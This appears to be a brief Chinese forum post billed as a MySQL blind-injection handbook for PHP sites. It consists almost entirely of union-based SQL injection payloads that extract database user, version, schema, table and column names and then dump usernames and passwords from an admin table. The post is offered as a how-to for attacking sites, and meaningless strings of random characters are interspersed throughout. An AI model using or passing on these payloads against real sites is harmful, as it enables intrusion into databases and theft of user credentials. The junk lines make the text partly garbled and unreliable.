mysql盲注手册

admin

教程内容:Mysql 5+php 注入
; |# M  t7 ]4 a
% Q& S: i" Y4 N4 C
$ [6 L4 @1 _0 a1 k' b. l3 g
; v7 C6 ?; u( G* D一.查看MYSQL基本信息(库名,版本,用户)
6 g7 r/ K  n5 ?
& n; L, `8 A; c. `8 h& sand 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*

二.查数据库

and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8  from information_schema.SCHEMATA limit 1,1/*
) B- U5 F  \0 j5 \' ]limit 从0开始递增，查询到3时浏览器返回错误，说明存在2个库。

5 Z. K, m( M1 H! H  p% b6 }三.暴表
* ?% W5 `8 i$ o5 Q
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*

& v, F# n- D4 j3 O9 ]limit 从0开始递增，查询到14时浏览器返回错误，说明此库存在13个表。
6 ?/ t: _% L, d1 l
四.暴字段
  _- {# ]% q4 a1 z6 B
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*

limit 从0开始递增，查询到时浏览器返回错误，说明此表存在N-1个列。

五.暴数据

8 ~3 ?9 S! V  Y2 |1 _and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
) V* t- c* A& n4 q) |
, w. f8 m. {  M6 F: J+ V
, ~( ~) w  m* ]8 w8 y这里直接暴明文的密码，大多时候我们遇到的是MD5加密之后的密文。